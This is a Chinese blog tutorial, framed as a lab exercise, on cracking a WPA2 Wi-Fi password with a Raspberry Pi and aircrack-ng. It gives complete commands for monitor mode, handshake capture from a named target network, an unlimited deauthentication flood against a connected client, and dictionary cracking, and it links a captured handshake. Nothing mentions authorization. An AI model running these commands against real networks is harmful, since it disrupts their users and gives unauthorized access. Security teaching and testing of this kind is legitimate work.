实验三:树莓派-暴力破解无线网络密码

树莓派-破解无线网络密码

作者:爱编程的小金毛球球 日期:2021年4月23日

所需设备:树莓派、网线、笔记本、无线网卡、路由器

一、工具说明

aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
aircrack-ng套件包括:
实验三:树莓派-暴力破解无线网络密码

二、安装

sudo apt-get install aircrack-ng

实验三:树莓派-暴力破解无线网络密码
查看是否安装成功

aircrack-ng

实验三:树莓派-暴力破解无线网络密码
实验三:树莓派-暴力破解无线网络密码

三、查看可用的无线网卡

sudo airmon-ng

实验三:树莓派-暴力破解无线网络密码

四、将无线网卡以监听模式启动

sudo airmon-ng start wlan1

实验三:树莓派-暴力破解无线网络密码

五、扫描周围WiFi

airodump-ng wlan1mon

实验三:树莓派-暴力破解无线网络密码

BSSID:WiFi的MAC地址、PWR:信号强度(结果一般是按强度排序)、Data:监听期间流量综合、CH:WiFi所使用信道、ENC:加密算法、ESSID:WiFi名称

搜寻到自己要破解的wifi后直接按Ctrl+C终止命令即可

98:0D:51:2C:E5:A8 -42 231 1592 0 11 360 WPA2 CCMP
PSK 717

目标是名为717的WiFi,其BSSID为98:0D:51:2C:E5:A8,信道为11

六、开始抓取握手包并保存成文件

(为了方便期间,最好创建专门的文件夹wireless_security)

airodump-ng -c 11 --bssid 98:0D:51:2C:E5:A8 -w /home/pi/wireless_security wlan1mon

实验三:树莓派-暴力破解无线网络密码

#-c指定信道,一定要是上一步查到的要破解的wifi所用信道
#–bssid指定bssid值,一定要是上一步查到的要破解的wifi的bssid
#-w指定捕获的握手到保存到的文件名

实验三:树莓派-暴力破解无线网络密码
从上面动态信息可以看出有1个连接(或者多个),这就可以进行洪水攻击然后拿到握手包,如果刚进去没有看到任何连接,先等待20秒左右,还是没有的话你就得重新选择目标了。在这里说明一下,要想抓到握手包就得进行洪水攻击,攻击的时候连接路由器的手机或者电脑会断开连接然后会自动连接wifi,连接的过程中就有一个数据的传送,而上面的airodump-ng就是要抓取这些数据,拿到需要破解的握手包,即.cap文件。

七、洪水攻击强制对方WiFi断开重连

(保持刚才的窗口,重新开一个窗口进行操作)

sudo aireplay-ng -0 0 -a 98:0D:51:2C:E5:A8 -c 5E:B9:8E:F7:7C:DE wlan1mon

(0为用deauth洪水攻击WiFi设备的次数,0为无限,-0 5则攻击5次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码)
注:为什么要穷举,而不是直接从数据包里面获取密码?因为数据包里面的密码是哈希加密的,哈希加密只能正向,不能反向推导,所以需要一个个正向推导,直到找到正确的密码。
实验三:树莓派-暴力破解无线网络密码
这个时候就注意抓包的窗口,出现WPA handshake :,就表示成功。如果有连接很快就可以抓到包,右上角证明成功抓取到重新认证的98:0D:51:2C:E5:A8的握手包 。成败的关键!!!!!!!!!!
使用Ctrl + C终止抓包命令
实验三:树莓派-暴力破解无线网络密码
此时会在指定的目录产生以下四个文件(每执行一次抓包命令就会产生一组,所以抓包时要注意自己是第几次执行的;不管也行下一步执定文件时使用*号通配符即可)
实验三:树莓派-暴力破解无线网络密码
然后就要进行跑包,就需要密码字典,可以从UCBUG下载。

八、使用字典文件暴力破解密码

sudo aircrack-ng -w DIR.txt ~/wireless_security/*.cap

或者

sudo aircrack-ng -a2 -b 98:0D:51:2C:E5:A8 -w DIR.txt ~/wireless_security/*.cap

#-a2 代表WPA的握手包
#-w指定要使用口令字典文件
#-b指定要目标wifi的mac地址(亦即bssid)
#*.cap是抓取到握手包的数据包文件,*是通配符

实验三:树莓派-暴力破解无线网络密码
实验三:树莓派-暴力破解无线网络密码
如果字典文件中存在WiFi的密码,那就能找到WiFi的密码,如果不包含那就找不到(所以总的来说WiFi成功破解率依赖于字典大小)。

九、关闭网卡监听模式(可选)

在前面步骤中,我们使用airmon-ng将网卡以监听模式启动,最后将网卡还原

airmon-ng stop wlan1mon

实验三:树莓派-暴力破解无线网络密码

注:

如果你不幸,在关键部分失败,那也没有关系,这里有已经
抓取到的握手包,你只需要导入,尝试一下后续步骤即可(内含假的密码字典一个0.0),记得点赞啊亲~~~~

链接:https://pan.baidu.com/s/1Kl8gIaIZc8Oz88pwHkzprA 提取码:3joo

上一篇:angular-cli常用命令


下一篇:初中生要学的那些文言文实词详解